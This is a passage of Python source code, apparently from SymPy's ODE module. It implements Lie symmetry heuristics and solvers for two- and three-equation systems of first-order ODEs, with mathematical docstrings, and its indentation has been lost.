B = hy.diff(y) + hy**2
C = hx.diff(x) - hx**2
if not (A and B and C):
return
Ax = A.diff(x)
Ay = A.diff(y)
Axy = Ax.diff(y)
Axx = Ax.diff(x)
Ayy = Ay.diff(y)
D = simplify(2*Axy + hx*Ay - Ax*hy + (hx*hy + 2*A)*A)*A - 3*Ax*Ay
if not D:
E1 = simplify(3*Ax**2 + ((hx**2 + 2*C)*A - 2*Axx)*A)
if E1:
E2 = simplify((2*Ayy + (2*B - hy**2)*A)*A - 3*Ay**2)
if not E2:
E3 = simplify(
E1*((28*Ax + 4*hx*A)*A**3 - E1*(hy*A + Ay)) - E1.diff(x)*8*A**4)
if not E3:
etaval = cancel((4*A**3*(Ax - hx*A) + E1*(hy*A - Ay))/(S(2)*A*E1))
if x not in etaval:
try:
etaval = exp(integrate(etaval, y))
except NotImplementedError:
pass
else:
xival = -4*A**3*etaval/E1
if y not in xival:
return [{xi: xival, eta: etaval.subs(y, func)}]
else:
E1 = simplify((2*Ayy + (2*B - hy**2)*A)*A - 3*Ay**2)
if E1:
E2 = simplify(
4*A**3*D - D**2 + E1*((2*Axx - (hx**2 + 2*C)*A)*A - 3*Ax**2))
if not E2:
E3 = simplify(
-(A*D)*E1.diff(y) + ((E1.diff(x) - hy*D)*A + 3*Ay*D +
(A*hx - 3*Ax)*E1)*E1)
if not E3:
etaval = cancel(((A*hx - Ax)*E1 - (Ay + A*hy)*D)/(S(2)*A*D))
if x not in etaval:
try:
etaval = exp(integrate(etaval, y))
except NotImplementedError:
pass
else:
xival = -E1*etaval/D
if y not in xival:
return [{xi: xival, eta: etaval.subs(y, func)}]
def lie_heuristic_linear(match, comp=False):
r"""
This heuristic assumes
1. `\xi = ax + by + c` and
2. `\eta = fx + gy + h`
After substituting the following assumptions in the determining PDE, it
reduces to
.. math:: f + (g - a)h - bh^{2} - (ax + by + c)\frac{\partial h}{\partial x}
- (fx + gy + c)\frac{\partial h}{\partial y}
Solving the reduced PDE obtained, using the method of characteristics, becomes
impractical. The method followed is grouping similar terms and solving the system
of linear equations obtained. The difference between the bivariate heuristic is that
`h` need not be a rational function in this case.
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 10 - pp. 12
"""
h = match['h']
hx = match['hx']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
coeffdict = {}
symbols = numbered_symbols("c", cls=Dummy)
symlist = [next(symbols) for _ in islice(symbols, 6)]
C0, C1, C2, C3, C4, C5 = symlist
pde = C3 + (C4 - C0)*h - (C0*x + C1*y + C2)*hx - (C3*x + C4*y + C5)*hy - C1*h**2
pde, denom = pde.as_numer_denom()
pde = powsimp(expand(pde))
if pde.is_Add:
terms = pde.args
for term in terms:
if term.is_Mul:
rem = Mul(*[m for m in term.args if not m.has(x, y)])
xypart = term/rem
if xypart not in coeffdict:
coeffdict[xypart] = rem
else:
coeffdict[xypart] += rem
else:
if term not in coeffdict:
coeffdict[term] = S.One
else:
coeffdict[term] += S.One
sollist = coeffdict.values()
soldict = solve(sollist, symlist)
if soldict:
if isinstance(soldict, list):
soldict = soldict[0]
subval = soldict.values()
if any(t for t in subval):
onedict = dict(zip(symlist, [1]*6))
xival = C0*x + C1*func + C2
etaval = C3*x + C4*func + C5
xival = xival.subs(soldict)
etaval = etaval.subs(soldict)
xival = xival.subs(onedict)
etaval = etaval.subs(onedict)
return [{xi: xival, eta: etaval}]
def sysode_linear_2eq_order1(match_):
x = match_['func'][0].func
y = match_['func'][1].func
func = match_['func']
fc = match_['func_coeff']
eq = match_['eq']
r = dict()
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
for i in range(2):
eqs = 0
for terms in Add.make_args(eq[i]):
eqs += terms/fc[i,func[i],1]
eq[i] = eqs
# for equations Eq(a1*diff(x(t),t), a*x(t) + b*y(t) + k1)
# and Eq(a2*diff(x(t),t), c*x(t) + d*y(t) + k2)
r['a'] = -fc[0,x(t),0]/fc[0,x(t),1]
r['c'] = -fc[1,x(t),0]/fc[1,y(t),1]
r['b'] = -fc[0,y(t),0]/fc[0,x(t),1]
r['d'] = -fc[1,y(t),0]/fc[1,y(t),1]
forcing = [S.Zero,S.Zero]
for i in range(2):
for j in Add.make_args(eq[i]):
if not j.has(x(t), y(t)):
forcing[i] += j
if not (forcing[0].has(t) or forcing[1].has(t)):
r['k1'] = forcing[0]
r['k2'] = forcing[1]
else:
raise NotImplementedError("Only homogeneous problems are supported" +
" (and constant inhomogeneity)")
if match_['type_of_equation'] == 'type6':
sol = _linear_2eq_order1_type6(x, y, t, r, eq)
if match_['type_of_equation'] == 'type7':
sol = _linear_2eq_order1_type7(x, y, t, r, eq)
return sol
def _linear_2eq_order1_type6(x, y, t, r, eq):
r"""
The equations of this type of ode are .
.. math:: x' = f(t) x + g(t) y
.. math:: y' = a [f(t) + a h(t)] x + a [g(t) - h(t)] y
This is solved by first multiplying the first equation by `-a` and adding
it to the second equation to obtain
.. math:: y' - a x' = -a h(t) (y - a x)
Setting `U = y - ax` and integrating the equation we arrive at
.. math:: y - ax = C_1 e^{-a \int h(t) \,dt}
and on substituting the value of y in first equation give rise to first order ODEs. After solving for
`x`, we can obtain `y` by substituting the value of `x` in second equation.
"""
C1, C2, C3, C4 = get_numbered_constants(eq, num=4)
p = 0
q = 0
p1 = cancel(r['c']/cancel(r['c']/r['d']).as_numer_denom()[0])
p2 = cancel(r['a']/cancel(r['a']/r['b']).as_numer_denom()[0])
for n, i in enumerate([p1, p2]):
for j in Mul.make_args(collect_const(i)):
if not j.has(t):
q = j
if q!=0 and n==0:
if ((r['c']/j - r['a'])/(r['b'] - r['d']/j)) == j:
p = 1
s = j
break
if q!=0 and n==1:
if ((r['a']/j - r['c'])/(r['d'] - r['b']/j)) == j:
p = 2
s = j
break
if p == 1:
equ = diff(x(t),t) - r['a']*x(t) - r['b']*(s*x(t) + C1*exp(-s*Integral(r['b'] - r['d']/s, t)))
hint1 = classify_ode(equ)[1]
sol1 = dsolve(equ, hint=hint1+'_Integral').rhs
sol2 = s*sol1 + C1*exp(-s*Integral(r['b'] - r['d']/s, t))
elif p ==2:
equ = diff(y(t),t) - r['c']*y(t) - r['d']*s*y(t) + C1*exp(-s*Integral(r['d'] - r['b']/s, t))
hint1 = classify_ode(equ)[1]
sol2 = dsolve(equ, hint=hint1+'_Integral').rhs
sol1 = s*sol2 + C1*exp(-s*Integral(r['d'] - r['b']/s, t))
return [Eq(x(t), sol1), Eq(y(t), sol2)]
def _linear_2eq_order1_type7(x, y, t, r, eq):
r"""
The equations of this type of ode are .
.. math:: x' = f(t) x + g(t) y
.. math:: y' = h(t) x + p(t) y
Differentiating the first equation and substituting the value of `y`
from second equation will give a second-order linear equation
.. math:: g x'' - (fg + gp + g') x' + (fgp - g^{2} h + f g' - f' g) x = 0
This above equation can be easily integrated if following conditions are satisfied.
1. `fgp - g^{2} h + f g' - f' g = 0`
2. `fgp - g^{2} h + f g' - f' g = ag, fg + gp + g' = bg`
If first condition is satisfied then it is solved by current dsolve solver and in second case it becomes
a constant coefficient differential equation which is also solved by current solver.
Otherwise if the above condition fails then,
a particular solution is assumed as `x = x_0(t)` and `y = y_0(t)`
Then the general solution is expressed as
.. math:: x = C_1 x_0(t) + C_2 x_0(t) \int \frac{g(t) F(t) P(t)}{x_0^{2}(t)} \,dt
.. math:: y = C_1 y_0(t) + C_2 [\frac{F(t) P(t)}{x_0(t)} + y_0(t) \int \frac{g(t) F(t) P(t)}{x_0^{2}(t)} \,dt]
where C1 and C2 are arbitrary constants and
.. math:: F(t) = e^{\int f(t) \,dt} , P(t) = e^{\int p(t) \,dt}
"""
C1, C2, C3, C4 = get_numbered_constants(eq, num=4)
e1 = r['a']*r['b']*r['c'] - r['b']**2*r['c'] + r['a']*diff(r['b'],t) - diff(r['a'],t)*r['b']
e2 = r['a']*r['c']*r['d'] - r['b']*r['c']**2 + diff(r['c'],t)*r['d'] - r['c']*diff(r['d'],t)
m1 = r['a']*r['b'] + r['b']*r['d'] + diff(r['b'],t)
m2 = r['a']*r['c'] + r['c']*r['d'] + diff(r['c'],t)
if e1 == 0:
sol1 = dsolve(r['b']*diff(x(t),t,t) - m1*diff(x(t),t)).rhs
sol2 = dsolve(diff(y(t),t) - r['c']*sol1 - r['d']*y(t)).rhs
elif e2 == 0:
sol2 = dsolve(r['c']*diff(y(t),t,t) - m2*diff(y(t),t)).rhs
sol1 = dsolve(diff(x(t),t) - r['a']*x(t) - r['b']*sol2).rhs
elif not (e1/r['b']).has(t) and not (m1/r['b']).has(t):
sol1 = dsolve(diff(x(t),t,t) - (m1/r['b'])*diff(x(t),t) - (e1/r['b'])*x(t)).rhs
sol2 = dsolve(diff(y(t),t) - r['c']*sol1 - r['d']*y(t)).rhs
elif not (e2/r['c']).has(t) and not (m2/r['c']).has(t):
sol2 = dsolve(diff(y(t),t,t) - (m2/r['c'])*diff(y(t),t) - (e2/r['c'])*y(t)).rhs
sol1 = dsolve(diff(x(t),t) - r['a']*x(t) - r['b']*sol2).rhs
else:
x0 = Function('x0')(t) # x0 and y0 being particular solutions
y0 = Function('y0')(t)
F = exp(Integral(r['a'],t))
P = exp(Integral(r['d'],t))
sol1 = C1*x0 + C2*x0*Integral(r['b']*F*P/x0**2, t)
sol2 = C1*y0 + C2*(F*P/x0 + y0*Integral(r['b']*F*P/x0**2, t))
return [Eq(x(t), sol1), Eq(y(t), sol2)]
def sysode_nonlinear_2eq_order1(match_):
func = match_['func']
eq = match_['eq']
fc = match_['func_coeff']
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
if match_['type_of_equation'] == 'type5':
sol = _nonlinear_2eq_order1_type5(func, t, eq)
return sol
x = func[0].func
y = func[1].func
for i in range(2):
eqs = 0
for terms in Add.make_args(eq[i]):
eqs += terms/fc[i,func[i],1]
eq[i] = eqs
if match_['type_of_equation'] == 'type1':
sol = _nonlinear_2eq_order1_type1(x, y, t, eq)
elif match_['type_of_equation'] == 'type2':
sol = _nonlinear_2eq_order1_type2(x, y, t, eq)
elif match_['type_of_equation'] == 'type3':
sol = _nonlinear_2eq_order1_type3(x, y, t, eq)
elif match_['type_of_equation'] == 'type4':
sol = _nonlinear_2eq_order1_type4(x, y, t, eq)
return sol
def _nonlinear_2eq_order1_type1(x, y, t, eq):
r"""
Equations:
.. math:: x' = x^n F(x,y)
.. math:: y' = g(y) F(x,y)
Solution:
.. math:: x = \varphi(y), \int \frac{1}{g(y) F(\varphi(y),y)} \,dy = t + C_2
where
if `n \neq 1`
.. math:: \varphi = [C_1 + (1-n) \int \frac{1}{g(y)} \,dy]^{\frac{1}{1-n}}
if `n = 1`
.. math:: \varphi = C_1 e^{\int \frac{1}{g(y)} \,dy}
where `C_1` and `C_2` are arbitrary constants.
"""
C1, C2 = get_numbered_constants(eq, num=2)
n = Wild('n', exclude=[x(t),y(t)])
f = Wild('f')
u, v = symbols('u, v')
r = eq[0].match(diff(x(t),t) - x(t)**n*f)
g = ((diff(y(t),t) - eq[1])/r[f]).subs(y(t),v)
F = r[f].subs(x(t),u).subs(y(t),v)
n = r[n]
if n!=1:
phi = (C1 + (1-n)*Integral(1/g, v))**(1/(1-n))
else:
phi = C1*exp(Integral(1/g, v))
phi = phi.doit()
sol2 = solve(Integral(1/(g*F.subs(u,phi)), v).doit() - t - C2, v)
sol = []
for sols in sol2:
sol.append(Eq(x(t),phi.subs(v, sols)))
sol.append(Eq(y(t), sols))
return sol
def _nonlinear_2eq_order1_type2(x, y, t, eq):
r"""
Equations:
.. math:: x' = e^{\lambda x} F(x,y)
.. math:: y' = g(y) F(x,y)
Solution:
.. math:: x = \varphi(y), \int \frac{1}{g(y) F(\varphi(y),y)} \,dy = t + C_2
where
if `\lambda \neq 0`
.. math:: \varphi = -\frac{1}{\lambda} log(C_1 - \lambda \int \frac{1}{g(y)} \,dy)
if `\lambda = 0`
.. math:: \varphi = C_1 + \int \frac{1}{g(y)} \,dy
where `C_1` and `C_2` are arbitrary constants.
"""
C1, C2 = get_numbered_constants(eq, num=2)
n = Wild('n', exclude=[x(t),y(t)])
f = Wild('f')
u, v = symbols('u, v')
r = eq[0].match(diff(x(t),t) - exp(n*x(t))*f)
g = ((diff(y(t),t) - eq[1])/r[f]).subs(y(t),v)
F = r[f].subs(x(t),u).subs(y(t),v)
n = r[n]
if n:
phi = -1/n*log(C1 - n*Integral(1/g, v))
else:
phi = C1 + Integral(1/g, v)
phi = phi.doit()
sol2 = solve(Integral(1/(g*F.subs(u,phi)), v).doit() - t - C2, v)
sol = []
for sols in sol2:
sol.append(Eq(x(t),phi.subs(v, sols)))
sol.append(Eq(y(t), sols))
return sol
def _nonlinear_2eq_order1_type3(x, y, t, eq):
r"""
Autonomous system of general form
.. math:: x' = F(x,y)
.. math:: y' = G(x,y)
Assuming `y = y(x, C_1)` where `C_1` is an arbitrary constant is the general
solution of the first-order equation
.. math:: F(x,y) y'_x = G(x,y)
Then the general solution of the original system of equations has the form
.. math:: \int \frac{1}{F(x,y(x,C_1))} \,dx = t + C_1
"""
C1, C2, C3, C4 = get_numbered_constants(eq, num=4)
v = Function('v')
u = Symbol('u')
f = Wild('f')
g = Wild('g')
r1 = eq[0].match(diff(x(t),t) - f)
r2 = eq[1].match(diff(y(t),t) - g)
F = r1[f].subs(x(t), u).subs(y(t), v(u))
G = r2[g].subs(x(t), u).subs(y(t), v(u))
sol2r = dsolve(Eq(diff(v(u), u), G/F))
if isinstance(sol2r, Expr):
sol2r = [sol2r]
for sol2s in sol2r:
sol1 = solve(Integral(1/F.subs(v(u), sol2s.rhs), u).doit() - t - C2, u)
sol = []
for sols in sol1:
sol.append(Eq(x(t), sols))
sol.append(Eq(y(t), (sol2s.rhs).subs(u, sols)))
return sol
def _nonlinear_2eq_order1_type4(x, y, t, eq):
r"""
Equation:
.. math:: x' = f_1(x) g_1(y) \phi(x,y,t)
.. math:: y' = f_2(x) g_2(y) \phi(x,y,t)
First integral:
.. math:: \int \frac{f_2(x)}{f_1(x)} \,dx - \int \frac{g_1(y)}{g_2(y)} \,dy = C
where `C` is an arbitrary constant.
On solving the first integral for `x` (resp., `y` ) and on substituting the
resulting expression into either equation of the original solution, one
arrives at a first-order equation for determining `y` (resp., `x` ).
"""
C1, C2 = get_numbered_constants(eq, num=2)
u, v = symbols('u, v')
U, V = symbols('U, V', cls=Function)
f = Wild('f')
g = Wild('g')
f1 = Wild('f1', exclude=[v,t])
f2 = Wild('f2', exclude=[v,t])
g1 = Wild('g1', exclude=[u,t])
g2 = Wild('g2', exclude=[u,t])
r1 = eq[0].match(diff(x(t),t) - f)
r2 = eq[1].match(diff(y(t),t) - g)
num, den = (
(r1[f].subs(x(t),u).subs(y(t),v))/
(r2[g].subs(x(t),u).subs(y(t),v))).as_numer_denom()
R1 = num.match(f1*g1)
R2 = den.match(f2*g2)
phi = (r1[f].subs(x(t),u).subs(y(t),v))/num
F1 = R1[f1]; F2 = R2[f2]
G1 = R1[g1]; G2 = R2[g2]
sol1r = solve(Integral(F2/F1, u).doit() - Integral(G1/G2,v).doit() - C1, u)
sol2r = solve(Integral(F2/F1, u).doit() - Integral(G1/G2,v).doit() - C1, v)
sol = []
for sols in sol1r:
sol.append(Eq(y(t), dsolve(diff(V(t),t) - F2.subs(u,sols).subs(v,V(t))*G2.subs(v,V(t))*phi.subs(u,sols).subs(v,V(t))).rhs))
for sols in sol2r:
sol.append(Eq(x(t), dsolve(diff(U(t),t) - F1.subs(u,U(t))*G1.subs(v,sols).subs(u,U(t))*phi.subs(v,sols).subs(u,U(t))).rhs))
return set(sol)
def _nonlinear_2eq_order1_type5(func, t, eq):
r"""
Clairaut system of ODEs
.. math:: x = t x' + F(x',y')
.. math:: y = t y' + G(x',y')
The following are solutions of the system
`(i)` straight lines:
.. math:: x = C_1 t + F(C_1, C_2), y = C_2 t + G(C_1, C_2)
where `C_1` and `C_2` are arbitrary constants;
`(ii)` envelopes of the above lines;
`(iii)` continuously differentiable lines made up from segments of the lines
`(i)` and `(ii)`.
"""
C1, C2 = get_numbered_constants(eq, num=2)
f = Wild('f')
g = Wild('g')
def check_type(x, y):
r1 = eq[0].match(t*diff(x(t),t) - x(t) + f)
r2 = eq[1].match(t*diff(y(t),t) - y(t) + g)
if not (r1 and r2):
r1 = eq[0].match(diff(x(t),t) - x(t)/t + f/t)
r2 = eq[1].match(diff(y(t),t) - y(t)/t + g/t)
if not (r1 and r2):
r1 = (-eq[0]).match(t*diff(x(t),t) - x(t) + f)
r2 = (-eq[1]).match(t*diff(y(t),t) - y(t) + g)
if not (r1 and r2):
r1 = (-eq[0]).match(diff(x(t),t) - x(t)/t + f/t)
r2 = (-eq[1]).match(diff(y(t),t) - y(t)/t + g/t)
return [r1, r2]
for func_ in func:
if isinstance(func_, list):
x = func[0][0].func
y = func[0][1].func
[r1, r2] = check_type(x, y)
if not (r1 and r2):
[r1, r2] = check_type(y, x)
x, y = y, x
x1 = diff(x(t),t); y1 = diff(y(t),t)
return {Eq(x(t), C1*t + r1[f].subs(x1,C1).subs(y1,C2)), Eq(y(t), C2*t + r2[g].subs(x1,C1).subs(y1,C2))}
def sysode_nonlinear_3eq_order1(match_):
x = match_['func'][0].func
y = match_['func'][1].func
z = match_['func'][2].func
eq = match_['eq']
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
if match_['type_of_equation'] == 'type1':
sol = _nonlinear_3eq_order1_type1(x, y, z, t, eq)
if match_['type_of_equation'] == 'type2':
sol = _nonlinear_3eq_order1_type2(x, y, z, t, eq)
if match_['type_of_equation'] == 'type3':
sol = _nonlinear_3eq_order1_type3(x, y, z, t, eq)
if match_['type_of_equation'] == 'type4':
sol = _nonlinear_3eq_order1_type4(x, y, z, t, eq)
if match_['type_of_equation'] == 'type5':
sol = _nonlinear_3eq_order1_type5(x, y, z, t, eq)
return sol
def _nonlinear_3eq_order1_type1(x, y, z, t, eq):
r"""
Equations:
.. math:: a x' = (b - c) y z, \enspace b y' = (c - a) z x, \enspace c z' = (a - b) x y
First Integrals:
.. math:: a x^{2} + b y^{2} + c z^{2} = C_1
.. math:: a^{2} x^{2} + b^{2} y^{2} + c^{2} z^{2} = C_2
where `C_1` and `C_2` are arbitrary constants. On solving the integrals for `y` and
`z` and on substituting the resulting expressions into the first equation of the
system, we arrives at a separable first-order equation on `x`. Similarly doing that
for other two equations, we will arrive at first order equation on `y` and `z` too.
References
==========
-http://eqworld.ipmnet.ru/en/solutions/sysode/sode0401.pdf
"""
C1, C2 = get_numbered_constants(eq, num=2)
u, v, w = symbols('u, v, w')
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
r = (diff(x(t),t) - eq[0]).match(p*y(t)*z(t))
r.update((diff(y(t),t) - eq[1]).match(q*z(t)*x(t)))
r.update((diff(z(t),t) - eq[2]).match(s*x(t)*y(t)))
n1, d1 = r[p].as_numer_denom()
n2, d2 = r[q].as_numer_denom()
n3, d3 = r[s].as_numer_denom()
val = solve([n1*u-d1*v+d1*w, d2*u+n2*v-d2*w, d3*u-d3*v-n3*w],[u,v])
vals = [val[v], val[u]]
c = lcm(vals[0].as_numer_denom()[1], vals[1].as_numer_denom()[1])
b = vals[0].subs(w, c)
a = vals[1].subs(w, c)
y_x = sqrt(((c*C1-C2) - a*(c-a)*x(t)**2)/(b*(c-b)))
z_x = sqrt(((b*C1-C2) - a*(b-a)*x(t)**2)/(c*(b-c)))
z_y = sqrt(((a*C1-C2) - b*(a-b)*y(t)**2)/(c*(a-c)))
x_y = sqrt(((c*C1-C2) - b*(c-b)*y(t)**2)/(a*(c-a)))
x_z = sqrt(((b*C1-C2) - c*(b-c)*z(t)**2)/(a*(b-a)))
y_z = sqrt(((a*C1-C2) - c*(a-c)*z(t)**2)/(b*(a-b)))
sol1 = dsolve(a*diff(x(t),t) - (b-c)*y_x*z_x)
sol2 = dsolve(b*diff(y(t),t) - (c-a)*z_y*x_y)
sol3 = dsolve(c*diff(z(t),t) - (a-b)*x_z*y_z)
return [sol1, sol2, sol3]
def _nonlinear_3eq_order1_type2(x, y, z, t, eq):
r"""
Equations:
.. math:: a x' = (b - c) y z f(x, y, z, t)
.. math:: b y' = (c - a) z x f(x, y, z, t)
.. math:: c z' = (a - b) x y f(x, y, z, t)
First Integrals:
.. math:: a x^{2} + b y^{2} + c z^{2} = C_1
.. math:: a^{2} x^{2} + b^{2} y^{2} + c^{2} z^{2} = C_2
where `C_1` and `C_2` are arbitrary constants. On solving the integrals for `y` and
`z` and on substituting the resulting expressions into the first equation of the
system, we arrives at a first-order differential equations on `x`. Similarly doing
that for other two equations we will arrive at first order equation on `y` and `z`.
References
==========
-http://eqworld.ipmnet.ru/en/solutions/sysode/sode0402.pdf
"""
C1, C2 = get_numbered_constants(eq, num=2)
u, v, w = symbols('u, v, w')
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
f = Wild('f')
r1 = (diff(x(t),t) - eq[0]).match(y(t)*z(t)*f)
r = collect_const(r1[f]).match(p*f)
r.update(((diff(y(t),t) - eq[1])/r[f]).match(q*z(t)*x(t)))
r.update(((diff(z(t),t) - eq[2])/r[f]).match(s*x(t)*y(t)))
n1, d1 = r[p].as_numer_denom()
n2, d2 = r[q].as_numer_denom()
n3, d3 = r[s].as_numer_denom()
val = solve([n1*u-d1*v+d1*w, d2*u+n2*v-d2*w, -d3*u+d3*v+n3*w],[u,v])
vals = [val[v], val[u]]
c = lcm(vals[0].as_numer_denom()[1], vals[1].as_numer_denom()[1])
a = vals[0].subs(w, c)
b = vals[1].subs(w, c)
y_x = sqrt(((c*C1-C2) - a*(c-a)*x(t)**2)/(b*(c-b)))
z_x = sqrt(((b*C1-C2) - a*(b-a)*x(t)**2)/(c*(b-c)))
z_y = sqrt(((a*C1-C2) - b*(a-b)*y(t)**2)/(c*(a-c)))
x_y = sqrt(((c*C1-C2) - b*(c-b)*y(t)**2)/(a*(c-a)))
x_z = sqrt(((b*C1-C2) - c*(b-c)*z(t)**2)/(a*(b-a)))
y_z = sqrt(((a*C1-C2) - c*(a-c)*z(t)**2)/(b*(a-b)))
sol1 = dsolve(a*diff(x(t),t) - (b-c)*y_x*z_x*r[f])
sol2 = dsolve(b*diff(y(t),t) - (c-a)*z_y*x_y*r[f])
sol3 = dsolve(c*diff(z(t),t) - (a-b)*x_z*y_z*r[f])
return [sol1, sol2, sol3]
def _nonlinear_3eq_order1_type3(x, y, z, t, eq):
r"""
Equations:
.. math:: x' = c F_2 - b F_3, \enspace y' = a F_3 - c F_1, \enspace z' = b F_1 - a F_2
where `F_n = F_n(x, y, z, t)`.
1. First Integral:
.. math:: a x + b y + c z = C_1,
where C is an arbitrary constant.
2. If we assume function `F_n` to be independent of `t`,i.e, `F_n` = `F_n (x, y, z)`
Then, on eliminating `t` and `z` from the first two equation of the system, one
arrives at the first-order equation
.. math:: \frac{dy}{dx} = \frac{a F_3 (x, y, z) - c F_1 (x, y, z)}{c F_2 (x, y, z) -
b F_3 (x, y, z)}
where `z = \frac{1}{c} (C_1 - a x - b y)`
References
==========
-http://eqworld.ipmnet.ru/en/solutions/sysode/sode0404.pdf
"""
C1 = get_numbered_constants(eq, num=1)
u, v, w = symbols('u, v, w')
fu, fv, fw = symbols('u, v, w', cls=Function)
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
F1, F2, F3 = symbols('F1, F2, F3', cls=Wild)
r1 = (diff(x(t), t) - eq[0]).match(F2-F3)
r = collect_const(r1[F2]).match(s*F2)
r.update(collect_const(r1[F3]).match(q*F3))
if eq[1].has(r[F2]) and not eq[1].has(r[F3]):
r[F2], r[F3] = r[F3], r[F2]
r[s], r[q] = -r[q], -r[s]
r.update((diff(y(t), t) - eq[1]).match(p*r[F3] - r[s]*F1))
a = r[p]; b = r[q]; c = r[s]
F1 = r[F1].subs(x(t), u).subs(y(t),v).subs(z(t), w)
F2 = r[F2].subs(x(t), u).subs(y(t),v).subs(z(t), w)
F3 = r[F3].subs(x(t), u).subs(y(t),v).subs(z(t), w)
z_xy = (C1-a*u-b*v)/c
y_zx = (C1-a*u-c*w)/b
x_yz = (C1-b*v-c*w)/a
y_x = dsolve(diff(fv(u),u) - ((a*F3-c*F1)/(c*F2-b*F3)).subs(w,z_xy).subs(v,fv(u))).rhs
z_x = dsolve(diff(fw(u),u) - ((b*F1-a*F2)/(c*F2-b*F3)).subs(v,y_zx).subs(w,fw(u))).rhs
z_y = dsolve(diff(fw(v),v) - ((b*F1-a*F2)/(a*F3-c*F1)).subs(u,x_yz).subs(w,fw(v))).rhs
x_y = dsolve(diff(fu(v),v) - ((c*F2-b*F3)/(a*F3-c*F1)).subs(w,z_xy).subs(u,fu(v))).rhs
y_z = dsolve(diff(fv(w),w) - ((a*F3-c*F1)/(b*F1-a*F2)).subs(u,x_yz).subs(v,fv(w))).rhs
x_z = dsolve(diff(fu(w),w) - ((c*F2-b*F3)/(b*F1-a*F2)).subs(v,y_zx).subs(u,fu(w))).rhs
sol1 = dsolve(diff(fu(t),t) - (c*F2 - b*F3).subs(v,y_x).subs(w,z_x).subs(u,fu(t))).rhs
sol2 = dsolve(diff(fv(t),t) - (a*F3 - c*F1).subs(u,x_y).subs(w,z_y).subs(v,fv(t))).rhs
sol3 = dsolve(diff(fw(t),t) - (b*F1 - a*F2).subs(u,x_z).subs(v,y_z).subs(w,fw(t))).rhs
return [sol1, sol2, sol3]
def _nonlinear_3eq_order1_type4(x, y, z, t, eq):
r"""
Equations:
.. math:: x' = c z F_2 - b y F_3, \enspace y' = a x F_3 - c z F_1, \enspace z' = b y F_1 - a x F_2
where `F_n = F_n (x, y, z, t)`
1. First integral:
.. math:: a x^{2} + b y^{2} + c z^{2} = C_1
where `C` is an arbitrary constant.
2. Assuming the function `F_n` is independent of `t`: `F_n = F_n (x, y, z)`. Then on
eliminating `t` and `z` from the first two equations of the system, one arrives at
the first-order equation
.. math:: \frac{dy}{dx} = \frac{a x F_3 (x, y, z) - c z F_1 (x, y, z)}
{c z F_2 (x, y, z) - b y F_3 (x, y, z)}
where `z = \pm \sqrt{\frac{1}{c} (C_1 - a x^{2} - b y^{2})}`
References
==========
-http://eqworld.ipmnet.ru/en/solutions/sysode/sode0405.pdf
"""
C1 = get_numbered_constants(eq, num=1)
u, v, w = symbols('u, v, w')
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
F1, F2, F3 = symbols('F1, F2, F3', cls=Wild)
r1 = eq[0].match(diff(x(t),t) - z(t)*F2 + y(t)*F3)
r = collect_const(r1[F2]).match(s*F2)
r.update(collect_const(r1[F3]).match(q*F3))
if eq[1].has(r[F2]) and not eq[1].has(r[F3]):
r[F2], r[F3] = r[F3], r[F2]
r[s], r[q] = -r[q], -r[s]
r.update((diff(y(t),t) - eq[1]).match(p*x(t)*r[F3] - r[s]*z(t)*F1))
a = r[p]; b = r[q]; c = r[s]
F1 = r[F1].subs(x(t),u).subs(y(t),v).subs(z(t),w)
F2 = r[F2].subs(x(t),u).subs(y(t),v).subs(z(t),w)
F3 = r[F3].subs(x(t),u).subs(y(t),v).subs(z(t),w)
x_yz = sqrt((C1 - b*v**2 - c*w**2)/a)
y_zx = sqrt((C1 - c*w**2 - a*u**2)/b)
z_xy = sqrt((C1 - a*u**2 - b*v**2)/c)
y_x = dsolve(diff(v(u),u) - ((a*u*F3-c*w*F1)/(c*w*F2-b*v*F3)).subs(w,z_xy).subs(v,v(u))).rhs
z_x = dsolve(diff(w(u),u) - ((b*v*F1-a*u*F2)/(c*w*F2-b*v*F3)).subs(v,y_zx).subs(w,w(u))).rhs
z_y = dsolve(diff(w(v),v) - ((b*v*F1-a*u*F2)/(a*u*F3-c*w*F1)).subs(u,x_yz).subs(w,w(v))).rhs
x_y = dsolve(diff(u(v),v) - ((c*w*F2-b*v*F3)/(a*u*F3-c*w*F1)).subs(w,z_xy).subs(u,u(v))).rhs
y_z = dsolve(diff(v(w),w) - ((a*u*F3-c*w*F1)/(b*v*F1-a*u*F2)).subs(u,x_yz).subs(v,v(w))).rhs
x_z = dsolve(diff(u(w),w) - ((c*w*F2-b*v*F3)/(b*v*F1-a*u*F2)).subs(v,y_zx).subs(u,u(w))).rhs
sol1 = dsolve(diff(u(t),t) - (c*w*F2 - b*v*F3).subs(v,y_x).subs(w,z_x).subs(u,u(t))).rhs
sol2 = dsolve(diff(v(t),t) - (a*u*F3 - c*w*F1).subs(u,x_y).subs(w,z_y).subs(v,v(t))).rhs
sol3 = dsolve(diff(w(t),t) - (b*v*F1 - a*u*F2).subs(u,x_z).subs(v,y_z).subs(w,w(t))).rhs
return [sol1, sol2, sol3]
def _nonlinear_3eq_order1_type5(x, y, z, t, eq):
r"""
.. math:: x' = x (c F_2 - b F_3), \enspace y' = y (a F_3 - c F_1), \enspace z' = z (b F_1 - a F_2)
where `F_n = F_n (x, y, z, t)` and are arbitrary functions.
First Integral:
.. math:: \left|x\right|^{a} \left|y\right|^{b} \left|z\right|^{c} = C_1
where `C` is an arbitrary constant. If the function `F_n` is independent of `t`,
then, by eliminating `t` and `z` from the first two equations of the system, one
arrives at a first-order equation.
References
==========
-http://eqworld.ipmnet.ru/en/solutions/sysode/sode0406.pdf
"""
C1 = get_numbered_constants(eq, num=1)
